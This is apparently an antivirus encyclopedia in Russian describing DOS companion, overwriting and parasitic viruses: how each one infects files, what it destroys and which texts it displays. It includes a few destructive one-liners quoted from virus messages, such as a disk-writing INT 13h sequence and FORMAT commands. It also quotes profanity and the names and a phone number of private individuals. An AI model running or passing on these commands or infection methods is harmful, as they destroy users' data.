HLLC - вирусы-спутники (Companion).
HLLO - вирусы, записывающиеся поверх кода программ (Overwrite).
HLLP - вирусы, сохраняющие работоспособность инфицированных программ (Parasitic).

HLLC.5000

Упакован LZEXE. Производит поиск *.exe файлов в текущем каталоге и создает для них вирусы-спутники с такими же именами, но с расширением COM. Создает 3 вируса-спутника за один сеанс работы.

HLLC.AIDS.8064

Неопасный нерезидентный вирус-спутник. Создает для EXE-файлов вирусный файл-компаньон с расширением COM. По окончании работы, если EXE файл- "хозяин" не найден.

HLLC.April1st

Нерезидентный вирус-спутник, написанный на Turbo C, в формате EXE-файла и упакованный "компрессором" PKLITE 1.03. Производит поиск и заражение *.exe файлов на текущем диске. При нахождении *.exe файла вирус создает файл e.lex, записывая в него свой вирусный код, переименовывает EXE-файл в файл с таким же именем, но с расширением OVL и переименовывает файл e.lex в файл с именем и расширением оригинального EXE-файла. При запуске такого EXE-файла, содержащего вирус, вирус производит попытки найти и заразить следующий EXE-файл, после чего запускает на выполнение OVL-файл, содержащий код инфицированной программы. Если такой OVL-файл не будет найден, то вирус выводит сообщение "Abnormal program termination".

HLLC.Bolek

При поиске и заражении EXE-файлов перехватывает INT 01 и INT 03. Может перезагрузить систему. Присваивает EXE-файлам расширение OVB и создает вирусный файл с именем оригинального EXE-файла. Содержит текст "Bolek! Bolek! Bolek!".

HLLC.Chainik

Опасный нерезидентный вирус. Производит поиск *.EXE-файлов на диске C: и заражает их, если в каталоге заражаемого EXE-файла имеются еще хотя бы 2 файла с такими же именами (например, NC.EXE, NC.MNU, NC.INI,...). Вирус присваивает EXE-файлу случайное расширение, записывает свой код в файл с именем заражаемого EXE-файла и сохраняет в своем теле название переименованного инфицированного EXE-файла. С 1 января 1997 года по воскресеньям вирус "вешает" систему, выведя на экран текст:
Сегодня воскресенье!
Я отдыхаю!
С 13 февраля по 13 числам месяца вирус проигрывает гимн Казахстана и последовательно выводит на экран следующие строки:
И все равно ты ЧАЙНИК, раз до сих пор меня не обезвредил!
Чего смотришь, выключай скорей компьютер!
Я же вирус, дурень!
Выключай, а то я файлы стирать буду!
Что, не веришь?
Я серьезно!
Сейчас чего-нибудь сотру...
Вот я стер ABCDEFGH.EXE
Почему я еще включен?
Ну ты тормоз, Вася!
Хочешь, чтобы я еще чего-нибудь стер?
Вот, пожалуйста, стер IJKLMNOP.EXE
Мужик, не доводи меня!
Выключай меня скорей!
Ну, как хочешь, сейчас я сотру 100 файлов...
... и удаляет файлы на диске C:.

HLLC.Chs.6208

Опасный нерезидентный вирус-спутник. Упакован утилитой DIET. Найденным COM и EXE-файлам вирус присваивает имя, отличающееся только последней буквой. К последней букве вирус прибавляет значение ASCII 2, например, если файл назывался FILE.EXE, то вирус переименовывает его в FILG.EXE и создает вирус-спутник с именем оригинального файла - FILE.EXE. Вирус разрушает некоторые файлы, выводит сообщение:
Oh, excuse me, but something destroyed...
You can prevent your data lossing if you will go to bad,
because night is a time for sleeping (not for working !!!)

HLLC.CP

Неопасный вирус-спутник. Написан в формате EXE-файла и упакован PKLITE. При старте вирус производит поиск и заражение файлов C:\DOS\MEM.EXE и C:\DOS\SMARTDRV.EXE. Затем вирус производит поиск и заражение *.EXE- файлов в текущем каталоге. Заражение происходит следующим образом: вирус с помощью командного процессора производит переименование файла- жертвы в файл с расширением DAT, например, файл MEM.EXE будет переименован в MEM.DAT, затем, опять же, с помощью командного процессора вирус производит копирование файла, из которого вирус стартовал, в файл - жертву, например следующим образом: COMMAND.COM /C COPY CP.EXE MEM.EXE >NUL.

HLLC.Delme

Неопасный вирус-спутник. Переименовывает заражаемые файлы, присваивая им имена с расширением, две последние буквы которых XL и создает файл с кодом вируса, но с именем оригинального файла. Для файла WIN.COM создает файл TTENG.DLL. Для проверки разрешения записи на диск создает и удаляет файл DELME.ZZZ.

HLLC.Dope.4870, 5219

Неопасные вирусы-спутники. Написаны на Turbo C++ в формате COM-файла и упакованы PKLITE 1.15. HLLC.Dope.5219 содержит текст "DOPE By KiLLeRbytE".

HLLC.Dosinfo

Опасный вирус-спутник. Производит поиск *.BAT файлов. Если в каталоге, содержащем найденный BAT-файл вирусом не будет найден файл DOSINFO.EXE, то вирус создает данный файл и записывает в него вирусный код. После этого вирус создает файл OVERWR, в который записывает строки:
@echo off
dosinfo.exe после которых вирус записывает содержимое найденного BAT-файла. Оригинальный BAT-файл удаляется, а файлу OVERWR присваивается имя этого BAT-файла. 25 декабря, 7 октября, 1 мая, 17 июня, 3 октября, 9 ноября, 13 августа вирус удаляет файл C:\AUTOEXEC.BAT, после чего выводит в графическом режиме карикатуру на Эрика Хонекера (бывшего генерального секретаря компартии ГДР), ниже которой расположен текст:
Hiermit wurde Ihre Autoexec auf Anweisung des Ministerrates der Deutschen Demokratischen Republik gelФscht. Erichs letzte Rache! P.S. Ich komme wieder!
И проигрывает национальный гимн ex-ГДР.

HLLC.Halley

Содержит тексты:
HALLEY -virus v.1.0
-------------------
# Don`t panic, I`m the harmless one.
I just want to travel...
Have a nice day!
Shit happens... at .
I WANT TO TRAVEL!! I WANT TO TRAVELL!!

HLLC.Hambre

Опасный нерезидентный вирус, написанный на языке Borland C++ в формате EXE-файла. Удаляет в текущем каталоге файлы *.D??. Содержит текст "HAMBRE.C HAMBRE".

HLLC.Lab5

Опасный нерезидентный вирус. Последовательно создает на дисках A: и B: файлы config.exe, MsDos.exe, Io.exe, содержащие вирусный код. Т.е., если на диске уже присутствует файл config.exe, то вирус создает файл MsDos.exe. Вирус ищет на случайном логическом диске *.exe-файл, переименовывает его в файл, содержащий вместо первой буквы имени букву "Q", и создает с помощью командного процессора вирусный файл с оригинальным именем. После этого вирус создает новый файл C:\AUTOEXEC.BAT, в который записывает вызов созданной инфицированной программы. Содержит тексты "DON'T CATCH ME , REMEMBER", "Пожалуйста не стирайте файл lab_5.res..Это очень важные данные для меня.Спасиибо Вам"

HLLC.Mimicry

Содержит тексты "Mimicry virus v. 2.1 . Proudly in Nadym.","Your fuckin computer so fuckin bad ... I want cuureee him ... ha-Ha-HA".

HLLC.Murmansk

Неопасный нерезидентный вирус-спутник. Может завесить систему и вывести текст: Dear user! I worked whole day. And now I want to rest!ате EXE-файла и упакован утилитой TinyProg 3.3. При первом запуске вирус копирует с помощью командного процессора себя на диск C:, переименовывает файл C:\CONFIG.SYS в C:\@VIRUS2@.!!!. Создает новый файл C:\CONFIG.SYS, в который записывает строку INSTALL=RUNME.EXE /VIRUS_SESSION. Также вирус уничтожает командный процессор.

HLLC.Sputnic

Неопасный нерезидентный вирус-спутник. Создает файлы N.BAT и R.BAT, с помощью которых, посредством запуска командного процессора, производит присваивание *.EXE-файлу-жертве расширения *.STL, копирование вирусной программы под именем оригинального файла и запуск инфицированного файла -носителя. Вирус содержит в своем теле отладочную информацию из которой видно, что вирус был создан из исходного файла SPUTNIC.C.

HLLC.Uri

Неопасный нерезидентный вирус. Создает вирусные файлы-спутники с расширением URI для поражаемых EXE-файлов. Вирус содержит тексты:
Virus URI now activated !!!
Я - вирус Uri-безвредный, однако срочно пройдите курс Уринотерапии!
Пора помочиться на клавиатуру и в дисководы.
А вот Билли не повезло! Его окошечки не получат логотип
"Virus Uri compatible".
Vinnitsa Virus Soft © 1998 (VVS)

HLLC.Vs&W.3966

Неопасный нерезидентный вирус-спутник. Создает вирусный файл-спутник с расширением COM для EXE-файлов. При заражении файла включает режимы клавиатуры: NumLock, CapsLock, ScrollLock. Выводит текст "Я безвредное существо.". Также содержит тексты:
DPS.Companion Virus! © Copyright 1996 by Max Max
Вирус написан для Санкт-Петербургского ДПШ ( абсолютно безвредная )
Привет Миксеру, Мишке, Кириюхе, Виктору Ивановичу, и всем другим
Советую выполнить: Mov ax,310h / Xor cx,cx / Mov dx,80h / Int 13h

HLLC.Unvisible (1,2)

Неопасные вирусы.EXE-файлам присваивают расширение OVL и создают вирус- спутник с настоящим именем файла-жертвы. Создают файл VIRUS.DOC. По окончании работы вирусов данный файл удаляется. 13 числа после 13 заражений файлов создают в корневом каталоге файл _.COM и записывают в файл C:\AUTOEXEC.BAT вызов данного _.COM файла. _.COM производит переворачивание изображения на экране.

HLLO.AIDS.13952

Опасный нерезидентный вирус. Содержит тексты:
This File Has Been Infected By AIDS! HaHa!

HLLO.Hacks

Опасный вирус. Производит поиск *.EXE-файлов, удаляет их и вместо них создает файлы с теми же именами, но содержащими только вирусный код. По окончании своей работы вирус выводит текст "Looking for hacks" и пытается найти в доступных через переменную PATH каталогах файл AIDS1284.EXE. Если это ему удается, то вирус удаляет данный файл и выводит сообщение:
На твоем компе обнаружена опаснейшая программа, которой ты еще и пользуешься!!!! Это так называемый Aidstest 1284, который вовсе не Aidstest, а оригинальный hackersoft! Потому мы во избежание неприятностей аккуратно его затерли! Урря!
После чего выводит одно из следующих сообщений:
Program too big to fit in memory
Illegal copy
Error allocating int21h
Your mouse looks very sexually.
I cannot work with her.
Вставьте в дисковод наждачную бумагу и наберите FORMAT A: /S/U
Если у вас простаивает комп, наберите HA AR012 HA C:\*.*
Мы все живем для того, чтобы завтра сдохнуть.
Is any hacker a fucker?
Остановите винчестер!!!! Ну вот, уже поздно...
Insert key disk into drive A: and press TURBO

HLLO.Joker.10000, 11000

Опасные нерезидентные вирусы. Заражают EXE-файлы на дисках C: и A:. Разрушают *.DBF-файлы. По окончании своей работы выводят один из перечисленных ниже текстов:
Error in EXE file
File cannot be copied onto itself
Compare OK
Invalid Volume ID Format failure
Incorrect DOS version
Please put a new disk into drive A:
End of input file
END OF WORKTIME. TURN SYSTEM OFF!
Divide Overflow
Water detect in Co-processor
I am hungry! Insert HAMBURGER into drive A:
NO SMOKING, PLEASE! Thanks.
Don't beat me !!
Don't drink and drive.
Another cup of cofee ? OH, YES!
Can you fuck me ? Maybe ...
Coca-Cola is it !
What about ? Oh, yes. O.K. TODAY
Missing VGA! Call (209) 683-6858 !
Attention! Hard Disk is RADIOACTIVE!
I'm so much dirty! CLEAN ME!
Kiss my ... keyboard!
Hard Disk's head has been destroyed. Can you borow me your one?
Missing light magenta ribbon in printer!
In case mistake, call GHOST BUSTERS
Insert tractor toilet paper into printer.
Are you funny?
Keep smiling!
Warning! In drive A: are two diskettes.
Warning! Your mouse has some virus!
Disconnect your mouse, there are some cats!
I don't understand you. Can you repeat it?
West Lake Software and Data Research, WA 0108077, New Orleans, © 1986

HLLO.Karma

Опасный нерезидентный вирус. В конце свой работы выводит на экран текст:
You have bad karma!
Hare Krishna! Hare Rama!
Также содержит строки:
BAD KARMA
© Lamer of Virus
Vinnitsa

HLLO.M&M

Опасный вирус. Ищет *.EXE-файлы, создает их заново и записывает 8803 байт своего кода в них. Содержит текст "M&M". Иногда оставляет в памяти резидентную программу, производящую "осыпание" букв на экране.

HLLO.ShadowGard

Опасный вирус. Производит поиск *.COM и *.EXE-файлов и записывает свой код в начало файла, не сохраняя программный код. При удачном заражении выводит одно из сообщений: "Illegal copy", "Insufficient memory", "Network busy", "Drive not ready". Внутри вируса имеется текст:
[Shadow-Gard] in
This is only DEMO version ! Prepare...

HLLO.Termit

Опасный вирус. После заражения файла вирус выводит на экран текст.

HLLO.Tyst

Очень опасный вирус. Производит поиск *.* файлов в каталогах, обозначенных в переменной PATH. При нахождении файла-жертвы (например, файл FILE.EXE) вирус запускает командный процессор с параметрами ( допустим, запущенный инфицированный файл имеет имя C:\TYSTVIR.EXE): /C copy C:\TYST.EXE FILE.EXE> NUL. Т. о., вирус копирует свой код в файл-жертву, причем новые инфицированные файлы будут создаваться в текущем каталоге. При старте вирус выводит сообщение:
Tyst fФr fan.. Jag sprДnger!!

HLLO.Vm

Очень опасный вирус. Содержит тексты:
OBBS Net is the best fido-technology net in the world
For more information please call NS - SOFTWARE BBS
You cant use ESC key.This key allowed only for OBBS members Your sincirely VM
OBBS Net is the best fido-technology net in the world
For more information please call NS - SOFTWARE BBS
Sorry but floppy disk operations today supported only for OBBS users Your sincirely VM
OBBS Net is the best fido-technology net in the world
For more information please call NS - SOFTWARE BBS
Что-то с памятью твоей стало гы-гы
Your sincirely VM

HLLO.Vs&W.3017

Очень опасный вирус. Содержит текст:
ю Вирус под именем DPS ( от русского ДПШ ), создан в Санкт-Петербурге
ю Привет всем хакерам Санкт-Петербурга, а также Миксеру, Мишке, и
ю Виктору Ивановичу от Vs&W Hackers Group, by Mad Max Hacker
ю НУ ОЧЕНЬ ПЛОХОЙ ВИРУС ю
ю AлисA; Roxette; АрИЯ; Iron Maiden
ю © Copyrigth 1996, by Mad Max ( Vs&W ).
Все права защищены
( разумеется тут нет никаких прав, просто так, ради прикола
Привет Дмитрию Лозинскому и Игорю Данилову

HLLO.Vs&W.3836

Очень опасный нерезидентный вирус. Выводит сообщение:
Virus by Vs&W Hackers Group. Я не заражаю больше 5 файлов
С Новым Годом!
The World will hear from me again
А меня звать MadMax, привет Викторы Ивановичу из ДПШ
Прошу прощенья за то, что ЭТО попало к вам
Отошлите ЭТО Игорю Данилову или Дмитрию Лозинскому
Они разбируться сто к сему. В этом я уверен
Также содержит текст:
Вас приветствует Vs&W Hackers Group
Ради интереса мы написали этот вирус
Прошу дать ему название "VS&W", пожалуйста!!!
Ждите новых поступлений от хакеров Санкт-Петербурга
Вирус написано на Турбо Паскале 7.00, и упакован DIET`ом
Привет MiXER`у от MadMax`а
MiXER ты еще на Бэйсике страдаешь или нет?

HLLP.4641

Очень опасный вирус. Написан на Turbo Pascal и упакован PKLITE. Разрушает файлы с расширениями PAS,BAS,TXT,BAK,PCX,MID,PIC,CUT,C,ARC, PAK,ZIP,LZH,ICE,CHZ,ARJ.

HLLP.4665

Во время заражения файлов создает временные файлы MAIN.EXE и TEMP.EXE.

HLLP.7808 (1,2)

Неопасные нерезидентные вирусы. Написаны в формате EXE-файла. Появилась модификация вируса HLLP.7808(1),упакованная утилитой LZEXE версии 0.91.

HLLP.8905

Очень опасный нерезидентный вирус. В среду пытается уничтожить содержимое диска C:.

HLLP.BeginPas

Неопасный нерезидентный вирус. Написан на языке Pascal. Производит поиск *.PAS-файлов в текущем каталоге,открывает их, ищет строку "BEGIN" и сразу же после этой строки вставляет ссылку на процедуру "virus". Записывает данную вирусную процедуру на языке Pascal в исходные PAS- тексты. В результате после компиляции такого PAS-файла получится инфицированный исполняемый модуль, способный дальше инфицировать исходные тексты, написанные на языке Pascal в файлах *.PAS. При нахождении *.PAS-файла вирус выводит на экран его имя, после заражения файла выводит текст "Infected!".

HLLP.BelGUT

Неопасный нерезидентный вирус. Выводит на экран текст:
IT'S A LITTLE FUCK FROM BelGUT!

HLLP.Birthday.5824

Неопасный нерезидентный вирус. Написан на языке высокого уровня, видимо, Borland Turbo Pascal, в формате EXE-файла. Первые 5824 байт файла-жертвы вирус переносит в конец файла, а вместо этих байт записывает свой код с собственным заголовком EXE-файла и Relocation Table. 6,7 и 8 сентября выводит соответствующие строки: "Tomorrow will be my birthday !", "Today is my birthday !", "Yesterday was my birthday !". После чего "вешает" систему.

HLLP.Bishkek.3990, 4170, 4240

Опасные нерезидентные вирусы. Упакованы PKLITE (HLLP.Bishkek.3990 упакован LZEXE). HLLP.Bishkek.4170 разрушает *.BAS-файлы, записывая в них строку "(Smokie4 virus © by N5 school BISHKEK 1". Эту же строку вирус иногда выводит на экран.HLLP.Bishkek.4240 периодически записывает в загрузочные сектора дисков A:, B:, C: количество головок -1 (смещение +1Ah), после чего выводит текст "Smokie3 virus,я затер Ваш сектор Вы, поняли ? Y/N". Также содержит текст "Smokie3 © by N5 school Bishk". HLLP.Bishkek.3990 иногда выводит текст "Smokie4 virus (v) by N5 school BISHKEK" и содержит в своем теле тексты "GoodTie error", "PordTons VirBoy", "VirBoy in Bishkek".

HLLP.Ceib.4629, 5000

Неопасные нерезидентные вирусы. Написаны на Turbo Pascal в формате EXE- файлов и упакованы утилитой LZEXE.HLLP.Ceib.4629 создает и удаляет файл C.EIB, HLLP.Ceib.5000 - файл со случайным именем и с расширением TMP, видимо, для проверки разрешения записи на диск. HLLP.Ceib.4629 также создает файл SV11, а HLLP.Ceib.5000 - тот же случайный файл, в которые записывают 4629 или 5000 байт вирусного кода, а затем записывают содержимое найденного COM или EXE-файла-жертвы. После чего удаляют исходный файл, а файлу SV11 или случайному файлу присваивают имя файла- жертвы. Не заражают следующие файлы: NC.EXE, NCMAIN.EXE, IBMBIO.COM, IBMDOS.COM,COMMAND.COM.HLLP.Ceib.5000 устанавливает случайные системные дату и время. HLLP.Ceib.5000.

HLLP.Chs.6549

Опасный нерезидентный вирус. Упакован DIET. В субботу и воскресенье может натворить всевозможных "пакостей": замедлить клавиатуру, уничтожить содержимое CMOS, вывести сообщение,...
I know, you don't like me and my deeds...

HLLP.ChSU

Неопасный нерезидентный вирус. Упакован LZEXE. Удаляет файлы *.MS?. Содержит тексты "Quick Fuck virus from ChSU version 1.0", "Cheboksary - 95".

HLLP.Daemon

Неопасный нерезидентный вирус. Может вывести одно из нижеследующих текстов в рамке, которая стоит в списке первой:
ЙНННННН Exception error 666 at ННННННН»
ИННННННННННН Press RESET to continue НННННННННННј
Daemon's Gate virus v1.666
Attention! Your Hard Disk is RADIOACTIVE!
(Missing light magenta ribbon in printer!
In case mistake, call GHOST BUSTERS
Insert tractor toilet paper into printer.
Warning! Your mouse has some virus!
Disconnect your mouse, there are some cats!
Water detected in Co-processor
I am hungry! Insert HAMBURGER into drive A:
NO SMOKING, PLEASE! Thanks.
End of worktime. Turn off the computer.
Processor Pentium Pro 200MHz not found.
18Gb free disk space not found.
512Mb extended memory not found.
16Mb TRIDENT VGA video card not found.
Invalid user.
Send this to Danilov. He know what to what.
Insert new user into drive C:
Processor not found.
What is it ? I know. This is fuck.
Error. Can't fuck keyboard.
L O S E R ! ! !
Fuck you later !
User is LOH
Залипание клавиатуры !
Вентилятор защищен от записи !
CPU мертв, а FPU не заводится.
В дисководе A: две дискеты !
COMMAND.COM умер !
Плохой мотор detected !
Пробоина в диске C:
It's time to save your non-saved work,
because you have only ?? seconds left ?
Say bye-bye to your non-saved data

HLLP.Dekas

Опасный нерезидентный вирус. Удаляет *.DOC и *.TXT файлы, записывая в них перед удалением слово "Dekas".

HLLP.Destroy

Очень опасный нерезидентный вирус. Упакован LZEXE. В файлы: DIRINFO, *.PAS, *.BAS, *.ASM, *.BAT. *.ME, *.DIZ записывает различные тексты, содержащие нецезурные выражения.

HLLP.Doggy.6202, 6606, 6667, 6685, 6686, 8421, 9535

Неопасные нерезидентные вирусы. Упакованы WWPACK. HLLP.Doggy.9535 состоит из вируса HLLP.Doggy.6202 и некой "заглушки" длиной 3333 байт. При старте "заглушка" создает файл SWAP.$$$ куда записывает 3333 байта своего кода, затем она удаляет свой код (3333 байт) из стартовавшего файла и запускает этот файл, который содержит код вируса HLLP.Doggy.6202. Этот вирус производит поиск *.EXE-файлов и инфицирует их своим кодом (6202 байта). После чего вирус HLLP.Doggy.6202 читает 3333 первых байта из уже только что инфицированного EXE-файла и записывает их в конец этого файла. После чего HLLP.Doggy.6202 пытается прочитать 3333 байта "заглушки" из файла SWAP.$$$ и записать их в начало инфицируемого файла. Если же произойдет ошибка чтения из файла SWAP.$$$, то далее инфицированный файл сможет заражать файлы кодом вируса HLLP.Doggy.6202, но по окончании работы, как правило, такие файлы будут "вешать" систему. 28 числа многие вирусы выводят тексты:
HLLP.Doggy.6606:
P.S. Dr. Danilovv! You Web doesnt detect Pascal!
HLLP.Doggy.6686:
HAPPY BIRTHDAY! GOOD DOGGY! WE WISH ALL THE BEST! Our 3d version of GDB (GOOD GODDY`s BIRTHDAY) !!!!
HLLP.Doggy.8421:
SHUTKA GLUPISHI !
Today is ГУУД ДОГГИ's БИРЗДЭЙ !!!
superskie igrushki: Zuganov - borodavka
super digger acade voleybol
Wi mojete ih kupit besplatno na beloye pivo bbs
zvoniti nam vsegda!!! ass-hole
etu programu napIsal KHARITONOV SASHKA
+7 (095) 135-62-53 (sasha)
ТОЛЬКО для вирмэйкеров -> у меня АОН
Ja nichego voobshe ne bous! Mne 7 let, ja talant!!
gorod moskva, storona zugoslavia ...
ЪДДД ХАРЯ ДДДДДДДДї
іДанилофф привet! і
іЯ просто прикалываюсь с моей igrushkou! і
АДДДДДДДДДДДДДДДДДЩ
нам конешно нравится веб, но он тормозит!
ЛОХинскай! неужели ты досихпор не мозешь мойпать иванхальф?
Как насчет exterface для лозатеста?
а том этот НЕГР С БЕЛЫМИ БУКАМИ!
привет КСПЕРМА IVGENYJ!
izvini chto tak nazivau, просто у тебя prikolнаяя фамилия!
mOGU POJERTVOVAT NA PIVO BBS 100 $$$$ B/W DOLLAROV
PRESS ENTER>
=-=-=-=-=-=-=-=-=
КТО не зоаполнит анкету, тот ПИДОР ГОРБАТЫЙ!
ЛОЗ, войди на свою BBS под именем MUDILA VATNY
и напиши пароль = GGGGGGG
ТАМ ДЛЯ ТЕБЯ маленький сюрпризе!!!
А ТЕПЕРЬ АНКЕТА :
1. Имя, фамилия, отчество ЕЛЬЦИНА БОРИСА НИКОЛАЕВИЧА
2. как назвается самый ***вый антивирус:
a) AIDSTEST
б) PIDRTEST
v) LOZATEST
3. Кто кого породил?
а) КСПЕРМА всех
б) лоз Дамнилофф
4. ОТКУДА ВЗЯЛСЯ ДАМНИЛОФФ?
А) ЛОЗ НАШОЛ ЕГО В КАПУСТЕ
б) ЕГО ПРИНЕС АИСТ
В) ЛОЗ ЕГО КУПИЛ В МАГАЗИНЕ
PRESS ENTER===>
BEST GAMES: WARCRAFT 2
BEST DEMO: MS-SUXX
ИНТЕРЕСНО, ВСТАВЯТ ЛИ ЭТИ ЧУВАКИ ЭТОТ ВИРУС В СВОИ ВИРЛИСТЫ
ЗДЕСЬ ЧАСТИЧНО(а может и очень сильно) ЗАДЕТО ИХ САМОЛЮБИЕ....ПОСМОТРИМ
WITH KINDEST REGARDS, YOURS KHARITONOV SASHKA
PRESS ENTER to format your disk
Звездочками (*) в данном сообщении заменены фамилия и координаты девушки, которой был посвящен данный вирус. Элла попросила меня убрать эти строки из данного описания. Видимо, ей не очень понравилась любовь господина Харитонова Александра.
HLLP.Doggy.6685 3 числа выводит следующий текст:
MegaDeth 94 Youthanasia
MegaDeth 95 Hidden Treasures
MegaDeth 96 Peace Sells... But who's buying
HLLP.Doggy.6202, 9535 5 числа выводит текст:
Имеют также тексты:
HLLP.Doggy.6606:
GOOD DOGGY`S BIRTHDAY VIRUS V3.0
St. Peterburg © 1996 May
Written in PSCVG V2.1 by Robocop
-------------------------------------------------
Especially for GOOD Doggy from Robocop!
Onyx is dead, I can`t beleive it. Fucking Skins!
Bad command or file name
DOG!
HLLP.Doggy.6667:
Элла
HLLP.Doggy.6685
© 1996 X-PROXET Labs, St. Peterburg
MegaDeth V1.0
-=-=-=-=-=-=-=-
MegaDeth Live
MD96
HLLP.Doggy.6686:
© 1996 GDB V3.0 X-PROXET Labs, St. Peterburg
Written by Dwarven-Mike and Robocop
Happy birthday, Good Doggy!
Dear Doggy, we wish you to spend this holiday very nice!
We wish your parents to present you nice modem & upgrade!
We wish you eat a lot, drink smth and fuck smb as a real
enjoyment!
Yours, X-PROXET
Dwarven-Mike, Robocop, Kharitonov Alexander, SMACKMAN,
Scat-J, NightRider, PollutionPreventer, Swat, Skinhead,
Stryker, Verenia and newcomers.
Enjoy!
X-PROXET Best Pascal Program Club © 1992-96 SMACKMAN
Bad command or file name
DOG3
HLLP.Doggy.8421:
GOOD DOGGY`S BIRTHDAY VIRUS V2.0
-----------------------------------
Pascal Source Code Virus Generator © 1995
© 1996 February by X-PROXET labs
St. Petersburg
PROGRAMMING GROUP:
Funny text by Kharitonov Alexander
Generator written by Dwarven-Mike © 1995 December
Work & modification by SMACKMAN (president of X-PROXET)
Distributors: Scat-J, Robocop, PollutionPreventer
------------------------------------
Happy birthday GOOD DOGGY!
I think you will like this virus and text
© 1996 SMACKMAN (press enter)
Bad command or file name
BUT why?
ежик
HLLP.Doggy.6202, 9535:
Элла! Я люблю тебя!
Bad command or file name
ZAK

HLLP.Feci

Неопасный нерезидентный вирус. Содержит текст "ЛДПР - НАШ ЛИ[1][1]ДЕР!!!
=== Feci Quod Potui, Faciant Meliora Potentes".

HLLP.FireLove

Опасный нерезидентный вирус. 18 числа месяца уничтожает содержимое 500 секторов диска C:. Содержит текст "Virus [Fired Love 10217] Version 1.0...! By L.S.Y.".

HLLP.Forever

Неопасный нерезидентный вирус. 23 числа выводит текст:
This is not a virus, not a trojan horse and not a logic bomb!
This is love, love forever!
Dear Maria I LOVE YOU !!!
I LOVE YOU! I LOVE YOU!
GROSSER & TAPEWORM & GURRE!
Press a key to continue
Содержит тексты "Disk is write-protected", "Lena", "Ira", " Diana", "Natasha", "Polina", "Tanya", "Olya", "Marina", "Maria","Katya","frv1".

HLLP.Frontier

Опасный нерезидентный вирус. Упакован утилитой AINEXE.Содержит ошибки. Пытается создавать на всех доступных дисках файл VICIOUS, после чего удаляет его. Изменяет системную дату и время. Имеет текст "frontier".

HLLP.Grosser

Неопасный резидентный вирус. Упакован утилитой WWPACK. Содержит текст:
GROSSER V3.0 , GROSSER & GOOD DOGGY ARE COOL GUYS! RULEZ!
MANY GREETINGS TO GURRE AND OTHERS
Note: TAPEWORM is no longer TAPEWORM
He is GOOD DOGGY now - NOW IT IS TIME TO GREET ALL FRIENDS (BOYS):
Granov Ilya, Ivan Dmitriev, Oryol Vladimir, Alex Fomin,
Gavrilov Ivan, Stupnikov Yaroslav,Tom Funikov,
Shishkin Vova, Alex Senin, Alex Bezyazichni,
Kirill Skobelev, Alexander Morozov, Maxim
Chudnov, Igor Voloshin, Pual Kobilchak,
Mike Funikov, .. the list will never end
AND MANY GREETINGS TO GIRLS (ESPECIALLY ELLA):
Loginova Polina, Soboleva Ella, Natasha Kulesh,
Lena Pronina, Katya Kiryanova, Masha Gromova,
Diana Kemularia, Irina Fionova, Alina Mikhailova
... and so on
Antivirus writers:
Igor Daniloff, Dmitry Lozinsky, Eugene Kaspersky,
Dmitry Mostovoy and others...
GREETINGS TO MUSIC GROUPS:
METALLICA, MEGADETH, SLAYER, SEPULTURA,
JIMI HENDRIX, DEEP PURPLE, NIRVANA, BEATLES, RED HOT CHILLI PEPPERS
ICE-T, ONYX, HOUSE OF PAIN, ICE CUBE, TONE LOC, PUBLIC ENEMY
ARRESTED DEVELOPMENT, KRISS KROSS AND OTHERS
AND NOW... IT IS TIME FOR FUCKS:
MANY FUCKS TO:
KORZIN OLEG, AFONIN ANTON, HARKOV SASHA, RJANIH ANDREY
prikL: Данное произведение является выдумкой автора !
Любые совпадения случайны

HLLP.Grunt

Неопасный нерезидентный вирус. Упакован LZEXE. 16 числа заполняет экран текстом "ЕЛЬЦИН - ПРЕЗИДЕНТ!!!". При заражении файлов создает временный файл grunt.swp. Содержит строку "School 1279".

HLLP.Happy

Неопасный нерезидентный вирус. Если по окончании работы вируса, клавиша Alt - нажата, то вирус выводит текст "DON'T WORRY, BE HAPPY !".В январе до 14 числа выводит текст "HAPPY NEW YEAR !".

HLLP.Inna.5260

Неопасный нерезидентный вирус. Написан на Turbo Pascal в формате EXE- файла и упакован утилитой PKLITE 1.12. При старте вируса, он производит поиск и заражение EXE-файлов, удаляет вирусный код из стартовавшей программы, запускает ее на выполнение, после чего заражает вновь. В период с 10.00 до 18.00 выводит текст.

HLLP.Izvrat

Неопасный резидентный вирус. Упакован PKLITE. Скрывает приращение длины инфицированных файлов. Содержит зашифрованные тексты:
Izvrat v3.1beta (cl) Dirty Nazi
Stealth Group World Wide
Thanks Int O`Dream & Borland
Happy birthday, Dirty Nazi!
У кaждoгo из нac быть мoгyт paзныe хoды, нo цeль y нac eдинa...
Koгдa я yмep, нe былo никoгo, ктo бы этo oпpoвepг... AidsTest.
Abnormal program termination

HLLP.Kasf

Очень опасный нерезидентный вирус. Уничтожает файлы с расширениями BAK, PAS, MCD и ASM. Создает и удаляет файл Kasf, за который и получил свое название.

HLLP.Metal.7929, 13040

Неопасные нерезидентные вирусы. HLLP.Metal.7929 упакован PKLITE, а HLLP.Metal.13040 зашифрован с помощью какой-то файловой защиты. Если вирусы стартуют из инфицированной программы AIDSTEST.EXE, то он выводят сообщение "И вот я в Aidstest-е !!! Ха-Ха-Ха", если из WEB.EXE - то "Привет Игорю Данилову ...". Также могут выводить тексты "Без паники !!!", "Programm Header error !!!".HLLP.Metal.7929 выводит иногда текст:
METALOLOM-VIRUS Version 3.0 © Clug
HLLP.Metal.13040 в понедельник в мае, или в субботу, или 25 числа
месяца выводит следующее сообщение:
Вам профессионаллы посвящается...
Данный вирус написан ....... догадайтесь сами кем !!!!!!!
Если Вы не перечислите 100 $ в пользу голодающих детей Африки то Ваш
жесткий диск будет уничтожен !!!
Выключать компьютер я Вам не советую так-как все DBF файлы находятся
в XMS памяти, а с диска временно стерты ! Так-что подумайте !!!
---------------------------------------------------------------------
У Вас есть 48 часов потом я вызову перезагрузку и Ваши файлы будут
УНИЧТОЖЕНЫ !!!
Время пошло ...
2880 минут

HLLP.Moonlight.4389

Очень опасный нерезидентный вирус. Написан на Turbo Pascal в формате EXE-файла и упакован утилитой DIET. В COM-файлы, а также в файл C:\IO.SYS или в C:\IBMBIO.COM записывает 5 байт передачи управления в BIOS на процедуру перезагрузки. Заражает EXE-файлы, создавая файл IMMAGE.PCX, записывая в него код вируса, копируя код EXE-файла. После чего оригинальный EXE-файл удаляется, а файлу IMMAGE.PCX присваивается его имя. Не заражает программы ADINF, ADINFEXT, AIDSTEST, DRWEB, SCAN. По окончании работы вирус выводит текст:
Data error reading drive C:
Abort, Retry, Ignore, Fail?
